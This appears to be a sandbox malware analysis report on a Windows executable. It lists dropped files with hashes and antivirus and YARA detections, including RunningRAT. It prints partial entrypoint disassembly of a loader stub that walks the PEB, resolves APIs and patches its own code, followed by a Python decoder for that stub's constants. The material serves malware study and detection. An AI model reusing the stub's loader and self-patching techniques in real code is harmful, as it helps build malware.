SHA1: F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256: B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):1.5
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nv:9
                                                                                                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):1.5
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nv:9
                                                                                                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):1.5
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nv:9
                                                                                                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):1.5
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nv:9
                                                                                                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):1.5
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nv:9
                                                                                                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):1.5
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nv:9
                                                                                                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.
                                                                                                              Process:C:\Users\user\Desktop\gE4NVCZDRk.exe
                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26112
                                                                                                              Entropy (8bit):6.077721048640773
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:8T9IWqIwt10zr6lXYhCRdkyurLmC2S1xJrQcWrH/RUAMO0MY0holUxHdHq4tKDES:8ht+Izr6pqRrLuS1vzWpaGZHdFYDG
                                                                                                              MD5:DB598538E7A70B73298F6424AE507E02
                                                                                                              SHA1:D06A04FB9CA1BB8DA5974870196AE5C0EADC1FA9
                                                                                                              SHA-256:CC4AB82995B0C0C827E99870948EF6A1371D4D1ED6D167A087C0D5C123D0F15E
                                                                                                              SHA-512:EBEDB94E2BA77836317596557FB447E6ABC78FECFAFCE8DE900D70202994FE829459665E0DEC8813C51039B64A12D08258BC6074324B729994B61E8467F5E3FA
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: MALWARE_Win_RunningRAT, Description: Detects RunningRAT, Source: C:\Users\user\AppData\Local\Temp\6011859.dll, Author: ditekSHen
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 96%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: uHmFQqHIIA.exe, Detection: malicious
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........d...d...d..#G...d..x...d..{...d..zx...d..{...d..{...d...d...d...d..d..:k...d...B...d...D...d..Rich.d..........PE..L....w.T...........!.....@...$.......N.......P......................................................................pZ.......T..d............................p.......................................................P..$............................text....?.......@.................. ..`.rdata.......P.......D..............@..@.data........`.......P..............@....reloc..d....p.......^..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):1.5
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nv:9
                                                                                                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:modified
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):1.5
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nv:9
                                                                                                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.
                                                                                                              Process:C:\Users\user\Desktop\gE4NVCZDRk.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):15872
                                                                                                              Entropy (8bit):7.031113762428177
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                                                                                                              MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                                                                                                              SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                                                                                                              SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                                                                                                              SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 97%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: ib.exe, Detection: malicious
                                                                                                              • Filename: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe, Detection: malicious
                                                                                                              • Filename: 8VB4lVuZk3.exe, Detection: malicious
                                                                                                              • Filename: biKy3nZEyJ.exe, Detection: malicious
                                                                                                              • Filename: biKy3nZEyJ.exe, Detection: malicious
                                                                                                              • Filename: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, Detection: malicious
                                                                                                              • Filename: a4#Uff09.exe, Detection: malicious
                                                                                                              • Filename: 1.0.0.2.exe, Detection: malicious
                                                                                                              • Filename: log1.exe, Detection: malicious
                                                                                                              • Filename: log2.exe, Detection: malicious
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3444
                                                                                                              Entropy (8bit):5.011954215267298
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                                                                              MD5:B133A676D139032A27DE3D9619E70091
                                                                                                              SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                                                                              SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                                                                              SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                                                                              Malicious:false
                                                                                                              Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
Process:C:\Windows\System32\wbem\WMIADAP.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
Category:dropped
Size (bytes):48786
Entropy (8bit):3.5854495362228453
Encrypted:false
SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
MD5:DF877BEC5C9E3382E94FEA48FEE049AC
SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
Malicious:false
Process:C:\Windows\SysWOW64\svchost.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):61440
Entropy (8bit):6.199746098562656
Encrypted:false
SSDEEP:1536:H9ykYCTdiHQKrFXmw2RQln5IUmDjoX6+:HlMHprF2nRQln5I
MD5:889B99C52A60DD49227C5E485A016679
SHA1:8FA889E456AA646A4D0A4349977430CE5FA5E2D7
SHA-256:6CBE0E1F046B13B29BFA26F8B368281D2DDA7EB9B718651D5856F22CC3E02910
SHA-512:08933106EAF338DD119C45CBF1F83E723AFF77CC0F8D3FC84E36253B1EB31557A54211D1D5D1CB58958188E32064D451F6C66A24B3963CCCD3DE07299AB90641
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\System32\wbem\WMIADAP.exe
File Type:data
Category:dropped
Size (bytes):840878
Entropy (8bit):3.4224066455051885
Encrypted:false
SSDEEP:3072:xJQGb/6IPolY/OhyIGmZkzTMWcnqgspmTbQiIJEDc3dv+eBrq2Bw+1wQ5xcEkc7+:01nqgsp2gOKih3
MD5:D3ED23A3E63ACA8CF656C585568DA6D7
SHA1:1A499D7E9A030D53B2A4DBD36F6F14B6531A6094
SHA-256:AE5A6E258A41298BE6CF2B3DA812E992E1D6A3C7FBC7DD4AA8B413DA850E8B65
SHA-512:21E2953B0819567865DA9C80A7D07021D7ED48F4BA3CD843C42D13D18E0E8FB27FA2F7C4EC86D4A1F4D887146F0F7E9E05B6A53D85398EA43240C2E180D52E00
Malicious:false
Process:C:\Windows\System32\wbem\WMIADAP.exe
File Type:data
Category:dropped
Size (bytes):137550
Entropy (8bit):3.409189992022338
Encrypted:false
SSDEEP:1536:X1i4nfw8ld9+mRDaUR28oV7TYfXLi7NwrgSwNu56FRtg:XBnfw8ld9+mRDaUR28oV7TY+7S0ba
MD5:084B771A167854C5B38E25D4E199B637
SHA1:AE6D36D4EC5A9E515E8735525BD80C96AC0F8122
SHA-256:B3CF0050FAF325C36535D665C24411F3877E3667904DFE9D8A1C802ED4BCD56D
SHA-512:426C15923F54EC93F22D9523B5CB6D326F727A34F5FF2BDE63D1CB3AD97CAB7E5B2ABABBC6ED5082B5E3140E9342A4E6F354359357A3F9AEF285278CB38A5835
Malicious:false
Process:C:\Windows\System32\wbem\WMIADAP.exe
File Type:data
Category:dropped
Size (bytes):715050
Entropy (8bit):3.278818886805871
Encrypted:false
SSDEEP:3072:NUdGNuowE4j0PrRZnpETMDZ8M6d0PHHx643/A5BK9YXdhPHlVziwC4ALWI1dnmRh:78M6d0w+WB6I
MD5:342BC94F85E143BE85B5B997163A0BB3
SHA1:8780CD88D169AE88C843E19239D9A32625F6A73E
SHA-256:F7D40B4FADA44B2A5231780F99C3CE784BCF33866B59D5EB767EEA8E532AD2C4
SHA-512:0A4ED9104CAFCE95E204B5505181816E7AA7941DED2694FF75EFABAAB821BF0F0FE5B32261ED213C710250B7845255F4E317D86A3A6D4C2C21F866207233C57E
Malicious:false
Process:C:\Windows\System32\wbem\WMIADAP.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):3444
Entropy (8bit):5.011954215267298
Encrypted:false
SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
MD5:B133A676D139032A27DE3D9619E70091
SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1835008
Entropy (8bit):4.465989311726786
Encrypted:false
SSDEEP:6144:zIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNOdwBCswSbn:kXD94+WlLZMM6YFHE+n
MD5:25261D3F857EF0D116461DEBDCC93547
SHA1:324A6B84B8934EFDAA000DC83FED7F971BCCB200
SHA-256:A64C9C3EC478670517DE98DC60C017626CBF51FE35398ACB074941C9E3E52032
SHA-512:1E70E8A570213FE60B81151896D61D063D773CDDBC2D042E65B55D46058918D9A5D0715A172447DBE88473B9EE08A0CA431452A069C4D029264C8D1B9E5DC10E
Malicious:false
                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):5.561740167718479
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:gE4NVCZDRk.exe
                                                                                                              File size:69'632 bytes
                                                                                                              MD5:02b3757b29002a8fcabd9afaebf1f7d3
                                                                                                              SHA1:cecffd787a418e435a9019211dda54444c2184fd
                                                                                                              SHA256:e909609bcd7d6a217635b372abba6e55d034d2e55712b032844ce28ded020064
                                                                                                              SHA512:fa7312829ddb66c4e3dba341eb45b2625c45060cfb2265a53ddb54595dd28d9245959eee6065b50e58d1908660732785a0430ae9345455d4bbcefd52fc5b015a
                                                                                                              SSDEEP:1536:sb1MsHz3JDwhyWr+N95OTga6S+PGCq2iW7z:XsT3JezcMCSkGCH
                                                                                                              TLSH:35639E01634460F7C686637266F7A21B885A7EB20BB824CFE7E44D0F1CF49D5B83646B
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9..tW..tW..tW..h[..tW..{...tW.DhY..tW..k]..tW..kS..tW..RS..tW..tV.[tW..R\..tW..rQ..tW.Rich.tW.........PE..L....w.T...........
                                                                                                              Icon Hash:71b018dccec77331
                                                                                                              Entrypoint:0x40c000
                                                                                                              Entrypoint Section:/|wu>
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                              DLL Characteristics:
                                                                                                              Time Stamp:0x54FD77CC [Mon Mar 9 10:37:00 2015 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:24ffff844f7eed74e1f1064cc9840ba9
                                                                                                              Instruction
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              sub esp, 0000016Ch
                                                                                                              xor eax, eax
                                                                                                              push ebx
                                                                                                              push esi
                                                                                                              push edi
                                                                                                              mov dword ptr [ebp-24h], eax
                                                                                                              mov dword ptr [ebp-10h], eax
                                                                                                              mov dword ptr [ebp-14h], eax
                                                                                                              mov dword ptr [ebp-08h], eax
                                                                                                              mov dword ptr [ebp-0Ch], eax
                                                                                                              mov dword ptr [ebp-20h], eax
                                                                                                              mov dword ptr [ebp-18h], eax
                                                                                                              mov dword ptr [ebp-48h], 536B6558h
                                                                                                              mov dword ptr [ebp-44h], 652E5475h
                                                                                                              mov dword ptr [ebp-40h], 00006578h
                                                                                                              mov dword ptr [ebp-3Ch], 00000000h
                                                                                                              call 00007F5170BD3AB5h
                                                                                                              pop eax
                                                                                                              add eax, 00000225h
                                                                                                              mov dword ptr [ebp-04h], eax
                                                                                                              mov eax, dword ptr fs:[00000030h]
                                                                                                              mov dword ptr [ebp-28h], eax
                                                                                                              mov eax, dword ptr [ebp-04h]
                                                                                                              mov dword ptr [eax], E904C483h
                                                                                                              mov eax, dword ptr [ebp-04h]
                                                                                                              mov dword ptr [eax+04h], FFFF6661h
                                                                                                              mov eax, dword ptr [ebp-28h]
                                                                                                              mov eax, dword ptr [eax+0Ch]
                                                                                                              mov eax, dword ptr [eax+1Ch]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              mov eax, dword ptr [eax+08h]
                                                                                                              mov ecx, dword ptr [eax+3Ch]
                                                                                                              mov ecx, dword ptr [ecx+eax+78h]
                                                                                                              add ecx, eax
                                                                                                              mov edi, dword ptr [ecx+1Ch]
                                                                                                              mov ebx, dword ptr [ecx+20h]
                                                                                                              mov esi, dword ptr [ecx+24h]
                                                                                                              mov ecx, dword ptr [ecx+18h]
                                                                                                              add esi, eax
                                                                                                              add edi, eax
                                                                                                              add ebx, eax
                                                                                                              xor edx, edx
                                                                                                              mov dword ptr [ebp-30h], esi
                                                                                                              mov dword ptr [ebp-1Ch], edx
                                                                                                              mov dword ptr [ebp-34h], ecx
                                                                                                              cmp edx, dword ptr [ebp-34h]
                                                                                                              jnc 00007F5170BD3BFEh
                                                                                                              movzx ecx, word ptr [esi+edx*2]
                                                                                                              mov edx, dword ptr [ebx+edx*4]
                                                                                                              mov esi, dword ptr [edi+ecx*4]
                                                                                                              add edx, eax
                                                                                                              mov ecx, dword ptr [edx]
                                                                                                              add esi, eax
                                                                                                              cmp ecx, 4D746547h
                                                                                                              jne 00007F5170BD3B04h
                                                                                                              cmp dword ptr [edx+04h], 6C75646Fh
                                                                                                              jne 00007F5170BD3AFBh
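Reading the listing above: the stub stores a string on its stack four bytes at a time (the mov dword ptr [ebp-48h] through [ebp-3Ch] writes), uses call/pop to learn its own address and overwrites eight bytes of its own code at that address plus 0x225, then walks the PEB (fs:[30h], Ldr at +0Ch, InInitializationOrderModuleList at +1Ch, one entry further, DllBase at +08h from the link; on Windows XP that second entry is kernel32.dll, later versions order the list differently), locates that module's export directory through e_lfanew (+3Ch) and DataDirectory[0] (+78h), and compares export names four bytes at a time against 4D746547h and 6C75646Fh. The script below is an added example and is not part of the Joe Sandbox report: it takes the immediate-bearing lines of that listing (embedded as a constructed subset of the disassembly) and decodes the little-endian constants into the strings and bytes they represent, which is the usual first step when reading such a stub. What the stub later does with the recovered string is not shown in this excerpt.

```python
import re
import struct

# Subset of the entrypoint disassembly printed in this report: only the
# instructions that carry a 32-bit immediate are needed for the decoding.
ENTRYPOINT_ASM = """
mov dword ptr [ebp-48h], 536B6558h
mov dword ptr [ebp-44h], 652E5475h
mov dword ptr [ebp-40h], 00006578h
mov dword ptr [ebp-3Ch], 00000000h
mov dword ptr [eax], E904C483h
mov dword ptr [eax+04h], FFFF6661h
cmp ecx, 4D746547h
cmp dword ptr [edx+04h], 6C75646Fh
"""

# mov dword ptr [reg(+/-disp)], imm32   (MASM-style, trailing 'h' = hex)
_STORE = re.compile(
    r"mov dword ptr \[(?P<base>\w+)(?P<disp>[+-][0-9A-Fa-f]+h)?\],\s*(?P<imm>[0-9A-Fa-f]+)h")
# cmp reg, imm32  or  cmp dword ptr [reg+disp], imm32
_CMP = re.compile(
    r"cmp (?:dword ptr \[)?(?P<where>[^,\]]+)\]?,\s*(?P<imm>[0-9A-Fa-f]+)h")


def _disp_value(disp):
    """'-48h' -> -0x48, '+04h' -> 4, None -> 0."""
    if not disp:
        return 0
    sign = -1 if disp[0] == "-" else 1
    return sign * int(disp[1:-1], 16)


def collect_stores(asm):
    """Group the dword stores by base register and lay their bytes out in
    ascending address order. x86 is little-endian, hence struct '<I'."""
    by_base = {}
    for m in _STORE.finditer(asm):
        off = _disp_value(m.group("disp"))
        imm = struct.pack("<I", int(m.group("imm"), 16))
        by_base.setdefault(m.group("base"), {})[off] = imm
    result = {}
    for base, slots in by_base.items():
        offsets = sorted(slots)
        # The stores in this listing are contiguous dwords; refuse to
        # silently glue together anything that is not.
        if any(b - a != 4 for a, b in zip(offsets, offsets[1:])):
            raise ValueError(f"non-contiguous stores via {base}")
        result[base] = b"".join(slots[o] for o in offsets)
    return result


def stack_string(asm, base="ebp"):
    """NUL-terminated ASCII string the stub assembles on its stack."""
    raw = collect_stores(asm)[base]
    return raw.split(b"\x00", 1)[0].decode("ascii")


def patch_bytes(asm, base="eax"):
    """The eight bytes written into the stub's own code at [eax] and [eax+4]."""
    return collect_stores(asm)[base]


def decode_patch(raw):
    """Those bytes are 83 C4 04 (add esp, 4) followed by E9 rel32 (jmp);
    return the signed jmp displacement."""
    if raw[:3] != b"\x83\xc4\x04" or raw[3] != 0xE9:
        raise ValueError("unexpected patch prefix")
    return struct.unpack("<i", raw[4:8])[0]


def compare_constants(asm):
    """Immediates the stub compares against export-name bytes, as ASCII."""
    return [struct.pack("<I", int(m.group("imm"), 16)).decode("ascii")
            for m in _CMP.finditer(asm)]


if __name__ == "__main__":
    print("stack string :", stack_string(ENTRYPOINT_ASM))
    p = patch_bytes(ENTRYPOINT_ASM)
    print("code patch   :", p.hex(" "), "-> add esp, 4 ; jmp rel32", hex(decode_patch(p)))
    print("name compare :", compare_constants(ENTRYPOINT_ASM))
```

On this listing the stack string decodes to XekSuT.exe, the code patch is 83 C4 04 E9 61 66 FF FF (add esp, 4 followed by a jmp with displacement -0x999F), and the two export-name compares are "GetM" and "odul", the first eight bytes of a GetModule... export name; the comparison of the remaining bytes lies past the end of the excerpt.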
                                                                                                              Programming Language:
                                                                                                              • [C++] VS98 (6.0) SP6 build 8804
                                                                                                              • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa2a0 | 0x64 | .data
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb000 | 0xa98 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3000 | 0x280 | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1b83 | 0x2000 | af004437d972dc872368f31fffd6aaa6 | False | 0.4327392578125 | data | 5.330045711780258 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x3000 | 0x78b6 | 0x8000 | 7670af3ae88481f9995ead7463909f4f | False | 0.496185302734375 | data | 5.753859530710346 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xb000 | 0xa98 | 0x1000 | c41cc8dcf2debdfbcfbd52158b76ca73 | False | 0.26123046875 | data | 2.5169812284194717 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
